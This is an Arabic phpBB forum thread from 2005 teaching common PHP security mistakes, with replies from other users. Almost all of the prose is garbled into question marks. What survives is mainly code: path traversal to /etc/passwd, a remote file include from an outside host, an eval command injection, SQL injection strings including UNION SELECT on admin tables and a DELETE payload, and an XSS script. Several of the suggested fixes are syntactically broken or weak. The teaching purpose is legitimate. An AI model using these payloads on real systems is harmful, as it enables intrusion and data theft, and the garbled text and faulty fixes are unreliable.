منتديات phpBBArabia

الدعم العربي لمنتديات phpBB
http://www.phpbbarabia.com/community/

أخطاء المبرمجين الأمنية في php

http://www.phpbbarabia.com/community/viewtopic.php?t=15345

صفحة 1 من 1

????? ????????? ??????? ?? php

مرسل: السبت مايو 28, 2005 2:29 am
بواسطة مهند قمرة
????? ??? ?????? ??????? ????? ?? ?????? ??? ??????? ??????? ?????? ???? ?? ?????? ?? ???? ????? ?? ??????? ? ?? ?? ???? ???????? ???? ??? ?????? ????? ????? ?? ????????? ? ??? ??? ?? ??? ?? ?? ????????? ?? ??????? ??? ??? ??? ??????? ? ? ????? ??? ?????? ????? ??????? ????? ??? ?????? ????? ??????? ?????? ????? ??? ?? ?????? ?????? ?? ????? ? ????? ??????? ?????? ?? ??? ?? ?????? ????? ??? ???? ?? ?????? ?????? ??????? ? ????? ???? ????? ???? ???? ???????? ?? ???? ???? ?? ???? ? ?? ????? ??????.

1- ?? ???? ?? ??????? ????? ??? ???? ?? ??? ?????? ??? ??? ?????? ?? ??? ????? (???? ??? ??? ?????? ???????????? ? ?? ????? ??? ??) ? ?? ?? ?????? ????? include , require , ?? ?? ?? ???? ??????? ?????? ????? ??? ??????? ?? ??? ???????? ??? ?????? ?? ??? ????????.


????

كود: تحديد الكل

if(isset($page)) 
{ 
 include($page); 
}
 



??? ??? ?? ??? ?????? ?? ??? ????? $page ? ????? ??? ?? register_globals ?? ??? ??????? ??? ???? ??? ?????? ???????? ????? script.php?page=/etc/passwd
? ????? ??? ??? ??? ????? ?? ?????? ??? ??? ?? ??? ?? ??? ????? ????? ????? ?? ?????? ??? ?? ??? ??? ?? ????? ? ???? ?? ????? ?????? ??? /etc/passwd!!!!!

???? ????? ?? ????? ???? ??? ?? ????? ?? ??? ?? ???? ????????? ???? ?? ??????? ???? ?????? ????? ?? ????? ????.


????

كود: تحديد الكل

script.php?page=http://mysite.com/mal_script.php




?????? ??? ???????? ????? ?? ???? ??? ????? ??? ??????? ?? SSI ?? ????? ??????? ? ???? ?? ?????? ?? ??? ?????? ???????? ???? ????? ???? ????? ???? ??? ???????.



????

كود: تحديد الكل

$pages = array('index.html', 'page2.html', 'page3.html'); 
if( in_array($page, $pages) ) 
{ 
   include($page); 
{ 
else 
{ 
  die("Foot Bokra"); 
}
 


2- ????? ????? ??????? ?? ??? ???????? ?? ?????? eval ???? ??? ????? ???? ???????? ???? ?? ????? ?? ????? ???:

كود: تحديد الكل

script.php?input=;passthru("cat /etc/paswd");
 



? ??? ????? ????? ??? ????? ????? ??? /etc/passwd.
?? ??????? eval ???? ?????? ?????? ?? ??? ?????? ? ??? ???? ?? ????????? ??? ??????? ? ?? ??? ?????? ?? ??????? (Templates) ????? ?? ?????? ?????? ???????? ???????? ?? ??? ???????? ? ?????? ???? sprintf ????? ????.

مرسل: السبت مايو 28, 2005 2:34 am
بواسطة مهند قمرة
3- ???? ?? ?????? ?? ????????? ????? ???????? SQL Statement ????? ?? ????? ????? ????? ??? ????? ?????? ?? ??? SQL ?????? ???? ????? \ ??? ???? ????? ????? ?????? GET , POST , COOKIE ? ???? ??????? ??? ??? ?????? ?? ??????? (') ? ?? ?? ???????? ?? ???? ????????? ????? ??? ??????? ??? ????? ????? ??? ???? ???????? ???? ????? \ ??? ?? ??? ?????? ????? (') ???? ?? ????????? ? ????? ??? ???? ???????? $name ?? ??????? form ? ???? ????????? ??????:


كود: تحديد الكل

UPDATE users SET Name='$name' WHERE ID=1;
 


??? ??? ??????? ????? ??? ????? (') ???? ???? ?????? ??????? \ ??? ????? ? ??????? ?? ???? ????? (') ??? ???? ????????? ? ?????? ?? ???????? ???? ???????? ???????:


كود: تحديد الكل

$name',Admin='1
 



???? ?????? ???????? ????? ????? ??? ?? ???? ????????? ? ??????? ??? ??? ????????? ???????? ? ??????? ??????? ?????? ???????

كود: تحديد الكل

addslashes() ??  mysql_escape_string()
 


??? ??????? ??????? ????? ?? ???? ???? ????????? ? ??? ???? ???????? ???????? ? ????? ?????? magic_quotes_gpc ??? ???? ?????? ??????? ???????? ? ????? ?? ?? ???? ?? ??? ??????? ? ?????? ??????? ?????? get_magic_quotes_gpc() ?????? ??? ???? ?? ??? ??????? ?? ?? ? ?????? ?? ??????? addslashes() ?? ???? ???? ??????? ?????? ?????? ??????? \ ??? ???????? ??????? ?? ??? ????????.

4- ??? ????? ????? ?????? ?? ????? ???????? ???? ?? ??????? ??? ??????? ?? ????? ???????? ? ??? ????? ???????? ?????? ?? ???? ???? ????????? ?????? ?? ? ?????? ????? ?? ???? ????????? ??????? Shared Hosting ??? ?????? ??? ?? ?? ???? ??? ??????? ???????? ??????? ?????? ???????? ? ????????? ????? ????? ?????? ???????? ?????? ??? ??? 3DES ?? AES5 ? ?????? ?? ??????? ????? ????? ?????? ?? ?? ???????? ?? ???? ???? ?????? ??????? ? ?????? ???????? ?? ??? ????? ?? ???? ????? ?? ??????? ? ?? ??????? ??? ????? key ????? ???? ?????? ? ? ??? ??? ????? ???????? ????? ???? ? ????? ??? ?????????? ????? ? ???? ?????? ???? ??????? ?? ??????? ???? ???? ??????? ??????? Session hash functions ??? ???? SHA-1 ?? md5.

مرسل: السبت مايو 28, 2005 2:34 am
بواسطة مهند قمرة
5- ???? ????? ??? ??????? SQL
?????? ?? ???? ????????? ???? ???????? ?? ??????? ?????? ?? ??? ???????? ? ???? ?????? ??????:


كود: تحديد الكل

$stmnt = SELECT login_id FROM users WHERE user = '" .
$_POST["username"] . "' AND password = '" . $_POST["password"];
 




?????? ????? ?? ???????? ???? (#) ????? ?? ???? ?????? ?? ?? ???? ????????? ????? ???????:


كود: تحديد الكل

SELECT login_id FROM users WHERE user = 'hani'; #' AND password = ''
 




????? ??? ?????? ????? ???? ???? ????????? ??? ????? ???????? ????? (#) ? ?? ?? ????? ???? ?????? ?????!!
??? ?? ?? ??????? ??????? ?? ??? ?????? ???? ?? ????? ???????? ? ??????? ?????? ????? (#) ???? ???? ????????? ??? ????? (#) ???? ???? ?? ???? (???? ???? ?????????) ????? ?? ????? ? ???? ?????? ?????? ???????? addslashes().

6- ????????? ??? ??? ?? ????? ????? ????? ?????? ? ?? ??? ?? ???? ???????? ???? SHA-1 ? ????? MD5 ???? ?? ?????? ?? ?????????? ? ???? ???? ????? ??? 128-bit ??? ? ?? ????? ?? SHA-1 ???? ??? 160-bit ? ??? ??????? ?????:


كود: تحديد الكل

$insertSql .= "'" . sha1($_POST["password1"]) . ", ";
 




???? ?????? ???? ?? ?????? addslashes() ??? ????? ?????? ? ??? ???? ??? ???? ? ?? ?? SHA-1 ?????? ??? ??????? ????????? (Hexadecimal) ?? (0 ? 9 ? A - F) ????? ??? ?????? ?? ?????? ?? ?? ?????? ?????? ?? ??? ????????? ??? (').


??????? ?????? ?? ?????? ?????? ????????? (??????? ?? ??? ???????? ? ? ???????? ?????? ?? ????? ???????? ???????? ?????:


كود: تحديد الكل

$loginQuery .= " password = '". sha1($_POST["password"]) . "'";
 




??? ?? ?????? ?? ???? ?????? ??????? ????? ?????? ???? ?? ????? ???????? ???? ???? ??????? ??? ? ??????? ???????.

مرسل: السبت مايو 28, 2005 2:36 am
بواسطة مهند قمرة
7- ??????? (Session)
????? ??????? ??????? ? ???? ???? ????? ?? ??????? ????? ??? ????? ???:
??????? ?????? ?? ???????? ?? ??????? ? ???? ?? ???? ????? ???? ?????? ??? ???? ??? ?????? ? ???? ???? ?????? ???????? ????? ??? ??? ???????? ? ?????? SSL ?? TLS ??? ???? ?????? ? ? ?? ???? ??????? ?????? session_set_cookie_params ?? ????? session.cookie_secure ?? ??? ini ? ? ???? ??????? ????? ???? ???????? ???? ????? ??? ?????? ??? ???? ?????? ?? ???? ??? ??? ??? ??????? ???? ??? ?????? ? ????????.
??????? ??????? ??? ?????? ??? ?? ???? ?????? ?? ??????? ???? ??? (??? ???? ??????? ???????? ?????) ??? ??????? ?????? ?????? ? ??????? ?????? ??? ???? ???? ?? ???? ? ? ???? ?????? ?? ??? ???? ?????? ???? ?? ????? ????????? (??? ???IP ?????) ?? ?????? ?? ???? ???? ??????? ???????? ?????? (SHA-1 ?? MD5) ? ??? ??? ????? ????? ??????? ????? ??? ??? ? ??? ?????? ????????? ???????? ? ?????? ???? ?? ??? ???? ?????? ???????? ?? ??.
??????? ??????? ? ?? ???????? ?????? ?? ??????? ????? ? ????? ????? ??? ???? ?????? ? ?? ?????? ??????? ??? ??? ??????? ?????? ????? ????? ?? ??? 1 ? 10.000 ? ???? ?????? ???? ?????? ??? ??? ???? ?? ?? ??????? ??? ??? ?? 128-bit.

????? ???? ????? ???? ?? ??? ?? ?????? ?? ???? ???? ???????? session_start() ???? ?? ???? ????? ???? ?????? ???? ????? ?????? ? ????? ???cookie ?? ???? session_generate_id ? ??? ??? ??? ???? ?????? ??? ???????? ???? ????? ????? ?? ????? ???????? ?? ??????


كود: تحديد الكل

$_SESSION["user"] = new User($userData->login_id, $userData->name, $userData->email, $userData->username);
 




???? ???????? ????? ??: ???? ?????? login_id ? ????? name ? ?????? email ? ??? ???????? username.

?? ??????? ???????? ??? ???? ?????? ????? ???????? IP ? ????? ???? ???? ??? ??????


كود: تحديد الكل

$_SESSION["IP"] = $_SERVER["REMOTE_ADDR"];
$_SESSION["timestamp"] = time();
 



???? ??? ????? ????? ??????

????? ??????? ? ?????? ?? ?????? ????????:
?????? ?? ?????? ???????? ?????? ???? ???? ?? ???????? ??? ?????? ?????? ? ?? ??????? ??????? ???? ???? ????? ????? ?? ??? ??? ???????? ??? ???????? ? ??? ???? ?????? ????????.
??? ???? ?????? "includes/session.inc.php" ????? ??? ????? ???????? (?????? ?????? ?? ??????? ???? ???? ???????( ? ? ???? ????? ?????? ?? ?? ???????? ?? ?? ???? ??????? ??????? ? ?????? ???????? ?? ?????? ?? ?? ?????? ?? ??????? ???? ???? ? ???? ????? ??? ?????? ???????? ???? ????? ????? ?????? ? ??? ??????? ?? ?????? ?? ?? ????????? ????? ?? ?????? $_SESSION

كود: تحديد الكل

if(!isset($_SESSION["user"])) {
  die("Not logged in");
}




????? ?????? ?? ???? ?????? ??? ???? ????? ?????


كود: تحديد الكل

if(!is_numeric($_SESSION["user"]->loginID)) {
  die("Not logged in");
}
 




???? ?????? ???? ???? ?? ?? ???? ?????? ?? ?? ???????? ????? ?????? ? ??? ???? ?? ???? ??? ??? ???????? ?? ???? ?????? ??????? ????? ?? ????? ????? ???IP ???? ?????? ????? ??? ?? ????? ???????? ???? ???? ????????


كود: تحديد الكل

if($_SESSION["IP"] != $_SERVER["REMOTE_ADDR"]) {
   header("Location: user_logout.php");

}



?? ?? ????? ?????? ????? ??? ???? ?? 30 ????? (1800 ?????) ??? ???? ?????? ????? ? ?????? 30 ????? ???? ?????? ? ??? ??? ???? ??? ???? ???????

كود: تحديد الكل

if((time() - $_SESSION["timestamp"]) > 1800) { 
header("Location: user_logout.php?timeOut=1 "); 
} 
else { 
$_SESSION["timestamp"] = time(); 
}
 




?? ????? ????? ???????? ????? ???? ??? ??? ?? ????? ???? ??? ?? ???? ???????? ???????? ??????? ?? ????? ?????? ??? ????? ???????? ? ????? ?????? ?????? ???????? ???? ???? ??? ?? ??? ???????? ??????? ??? ??????? IP ? ???????


كود: تحديد الكل

$_SESSION = array();



??? ??? ???? ????? ????? ?????? ??????


كود: تحديد الكل

session_destroy();




????? ??? ???? ?? ???? ???? ?????? ?? ???cookie


كود: تحديد الكل

unset($_COOKIE[session_name()]);

مرسل: السبت مايو 28, 2005 2:37 am
بواسطة مهند قمرة
8- ???? ????? ??? ??????? SQL

?? ????? ????????? ??????? ??????? ?? ??????? ??? ????????? ?? ??? ?????? ?? ????????? ??????? ??? ???? ????????? ??? ?? ???? ?????? ??????? ??? ????? ?????? ??? ? ?? ?????? ?????? ?????? ???? ??????? ???????:


كود: تحديد الكل

$id = $_GET["id"];
$result = mysql_query("SELECT * FROM `articles` where id=$id;");
 




? ??? ??? ?? ??? ?????? ?? ??????? $id ???? ??? ???????? ????? ??? ?? ??? ?????? ?????? ??????? ?? ???? ??????? ???????? ?



كود: تحديد الكل

Page.php?id=0 UNION SELECT * FROM `admin_users`




????? ???? ????????? ??????:


كود: تحديد الكل

SELECT * FROM `articles` WHERE id=0 
UNION SELECT * FROM `admin_users`;
 





??? ??? ???? ?????? ????? ?? ??????? ?????? `admin_users` ? ?? ?????? ?? ??????? ???? ??? ????? ? ? ???? ??? ?? ??????? $id ?? ??? ??? ????? ?????? ?? ??? ??? (???) ? ???? ??????? ???? ??????? ??????? ? ??? ?????? ??? ?????? ???????? ???? intval ?????:



كود: تحديد الكل

$id = intval($_GET["id"]);




??? ??????? ??????? ? ??????? ?? ????:

كود: تحديد الكل

$id = $_GET["id"];
If (!is_numeric($id)) {
???????.echo "foot bokra"
} else {
???????.continue
}



? ????? ??? ? ??? ??????? ????? ?? ??:

كود: تحديد الكل

$name = $_GET["name"];
$result = mysql_query("SELECT * FROM `articles` 
WHERE title=\"$name\";");
 




? ??? ??? ?? ??? ?????? ?? ??????? $name ???? ??? ???????? ????? ??? ?? ??? ?????? ?????? ??????? ?? ???? ??????? ???????? -

كود: تحديد الكل

Page.php?name= UNION SELECT * FROM `admin_users` 
WHERE name="%




??? ???? ???????????? ?? ??????? ?????? `admin_users` ? ??????? ???? ??? ????? ? ???? ??? ?? ??????? $name ?? ????? ??? ??? ????? ?????? ?? ??????? ?????? $name ????? ??? ?? (???) ? ???? ??????? ?????? ?? ?? ?????? ?? (???) ? ????? ???? ????????? ? ??? ??????? ?????? ???:

كود: تحديد الكل

$name = str_replace("\"", """, $_GET["name"]);
 



??? ??????? ??????? ??? ??????:


كود: تحديد الكل

$name = str_replace("\"", "\\\"", $_GET["name"]);

مرسل: السبت مايو 28, 2005 2:42 am
بواسطة مهند قمرة
9- ???? ????? ??? ??????? SQL

?????? ?? ?????? ???????? ?? ???? ????????? ???????? ??? ??? ???????? ?? ???? ???? ?????? ??????? ??? ????????? ????? ??? ????? ?????? ???? ????? ???????? GET ??? ?????? POST ?? ??? ??????:

كود: تحديد الكل

$query = "SELECT id, name FROM `records` LIMIT "
        . $_POST['NUM'];
$result = $db->select($query);
 




? ??? ??????? ?????? ???????:

كود: تحديد الكل

<form action="form.php" method="POST">
<input type="text" name="NUM"
       value="5; DELETE FROM `records`">
<input type="submit">
</form>
 




???? ???? ????????? ??????:

كود: تحديد الكل

SELECT id, name FROM `records` LIMIT 5; 
DELETE FROM `records`
 




? ??? ???? ????? ????? ??? ????? ??? ??????? ?? ??? ??? ????? ?? ??????? ?? ???? ??????? ??? ????????? ? ???? ??? ?????? ??????? ?????? ??? ????????? ? ??????? ????? ??? ?? ??? ???????:

كود: تحديد الكل

function filter_sql($input) {
   $reg = "(delete)|(update)|(union)|(insert)";
   return(eregi_replace($reg, "", $input));
}
 



10- ????? ??????? ????????? Cross-Site Scripting XSS

?? ??????? ??????? ??????? ??????? ?????????(XSS) ? ?? ????? ??????? ????? ?????? ???? ?? ?????????? ??????? ?????? ??????? ?????? ?? ?????? ??????? ? ???????? ? ????? ????? ? ? ??????? ?? ??????? ???? ?? PHP ??? ? ???? ?? ?? ??? ?????? ??? ??????? ?? ?????? ? ?? ???? ???? ??????? ???? HTML ? Javascript ?? ?????? ?? ???? ??????? FORMS ??? ???? ????? ?? ???? ???????? ??????? ????? ?????? ???? ???? ???????? ?? ???????? ?? ?? ???? ??? ?? ??? ?? ????? ???????? ? ? ?????:


كود: تحديد الكل

$note = $_GET["note"];
If ($note) {
   echo $note;
}




?????? ???????? ????? ?????? ??????? ?? ???? ???? ??????? ?? ???????:


كود: تحديد الكل

Page.php?note=<script>alert("pop up");</script>




??? ???? ???? ??? ??????? ????? ???? HTML ? Javascript ??? ???????? ? ??? ???? ?????? ????? ? ?????? ????????? ??? ????? ?????? ? ???... ??? ?? ????? $note ? ????? ?????? ????????? ????? ???? ???? ??????? ???? ?????? ? ?????? ??????? ????? ????? ???? Javascript ?????? ??????? ?????? ??? ???? ???? ?? ??? ??? ?? ????? ?? ??????? pop up (? ??????? ??????? ???? ????? ?? ? ?? ?????? ??? ?? ?????? ??? ?????? ?? ??? ?????) ? ???? ?? ???? ???? < > ??? ?? ?????? ??????:

كود: تحديد الكل

$escapeChars[0] = array('<', '>');
$escapeChars[1] = array("&lt;", "&gt;");
$note = str_replace($escapeChars[0],$escapeChars[1],$_GET["note"]);
 



? ?????? ??????:

كود: تحديد الكل

$escapeChars[0] = array('<', '>');
$note = str_replace($escapeChars[0], "", $_GET["note"]);
 



???? ???? ??? ?????? ??? ??? ???? ??? ??????? ?? ?????? ? ?? ??????? ???? htmlentities() .



11- ??? ???? ????????

?? ?????? ?????? ????? ??? ???????? ?? ?? ??????? ???? ???? ???????? ????? ? ??????? ? ?????? ??? ??????? ? ?????? ?? ??????????? ? ? ??????? ?? ??? ?????? ?? ???? ???????? ??????? ???? ?????? ?????? ? ??????? ???? ?? ??? ???? ???? ???????? ? ???? ???? ??? ???????.

- ??? index.php ???? ?????? ?? ?????? ?????? Root.
- ????? ??????? ?????? ??? Config ???? ?? ???? ? ???? ???? ??? ???? ?????? /lib/.
- ????? ??????? ???? ?? ???? ???? ??? ???? ?????? /tpl/ ? ??? ????? ?????? ???????? ??? .htaccess.
- ????? ?????? Classes ???? ?? ???? ???? ????? /classes/ ? ??? ????? ?????? ???????? ??? .htaccess.
- ????? ????? ????? ?? ???? /images/.
- ??? ??? ?????? ????? ???? ?????? ActionScript ?????? ??? ?????? ????? ? ???? ???? /flashscr/.

??? ?? ???? ???? ?????? ?????? ???? ??????? ???????:

- ?? ?? ????????? ???????? ?? ??? index.php ???? ??????? parameters ??? ???? ????? ?????? ?? ????? ????? ?????? ???????? ??? ??? ????? ??????? ???? ????? ???? ???????? ?? ??? ???????.
- ???? ?????? ??????? FORMS ?????? ???????? ???? ???????? ??? ??? ????? ?????? ???????? ??? ?????? ???????: ?class=account&action=login ??? ???? ??????? ???? ????? ??? ? ??? ????? ?????? ???????? ?? ?? ???? ??????????.
- ???? ???????? ??????? ?? ????? ???????? ????? ??? ???????? ?? ???????? ??? ????? ??? ??? ????? ?????? ?????? ??????? ?? ??????? ????? ?? ???? ??? ????? ??????? ? ??????? ?? ??? ?????? ?? ??????? ??????? ???? index.php.


index.php
|
|--- ??? ????? ???????
|
|--- ????? ?????????
|--- ???????
|--- ???????
|--- ???? ????????
|--- ???????
|
|-----------|
|
|--- ????? ??????
|--- ???.???????
|--- ???.???????
|--- ???.???????
|--- ???.????????
|
||--- ???.???????
||
||--- ???? ???????
|
|--- ????? ????????


? ?????? ?????? ???? ??? ?????? ?? ??? ???? ???????? ??? ? ??? ???? ? ?? ??????? ?? ???? ??? ???? ?? ??????? ???????? ???????:

- ????? ???? ???????? ??????? (???? ??? ?????) ?? ??? ???????? ?? ????? ???????? ?? ???? ???? ??? ????? ???????.
- ????? ? ??? ???? ??????? ?? ???? ???? ??? ????? ???????.
- ?? ??? ?? ????? ?????? ???? ???? ??????? ?????? ???? ????? ???????? ??????? ? ??????? ?? ????? ?? ?????? ?????? ?? ??? ????? ???????.

?????? ?? ????? ?? ??? ?? ???? ?????? ?????????? ????? ??? ????? ???????? ???? ? ???? ?????? ??? ?????? ???? ?????.

مرسل: السبت مايو 28, 2005 2:45 am
بواسطة مهند قمرة
??? ??????? ????? ?? ??????? ????
??????: ???? ????
????? ??????:
http://www.zajilnet.com/forum/index.php?showuser=3616
------------------------------
??? ??? ???? ??????? ??????? ????????

مرسل: السبت مايو 28, 2005 4:03 am
بواسطة arabstar
???? ?? ??? ??? ?????? ?????? ????? ??????

??? ?????

مرسل: السبت مايو 28, 2005 10:03 am
بواسطة قلب العالم
?????? ????? ????? ???? ??????? :)

????? ??? ??? ??????? ????????? ???? ??????

????? ??? ??????? ????? ?????? ????? ?? ????? ????? :?:

??????? :)

مرسل: السبت مايو 28, 2005 12:29 pm
بواسطة ArabFriends
???? ??? ??????? ??? ???? ????,
??? ???? ????

?? ????? ?????

????? ??? ?????? ?????? ??? ??? ??????,
??? ???? ???? ?? ??? ????? ?? ??? ????? ? ???????? ?????? ???? ??? ?????? ?? ????? ??? ?????? ???? ??? :)

مرسل: السبت مايو 28, 2005 7:07 pm
بواسطة عبقري العرب
???? ????? ???????
? ??? ???? ??? ?????? ????? ????? ?? ???? ??? ??????? :wink:
جميع الأوقات تستخدم التوقيت العالمي+03:00
صفحة 1 من 1

phpBB® Forum Software © phpBB Limited

Translated by phpBBArabia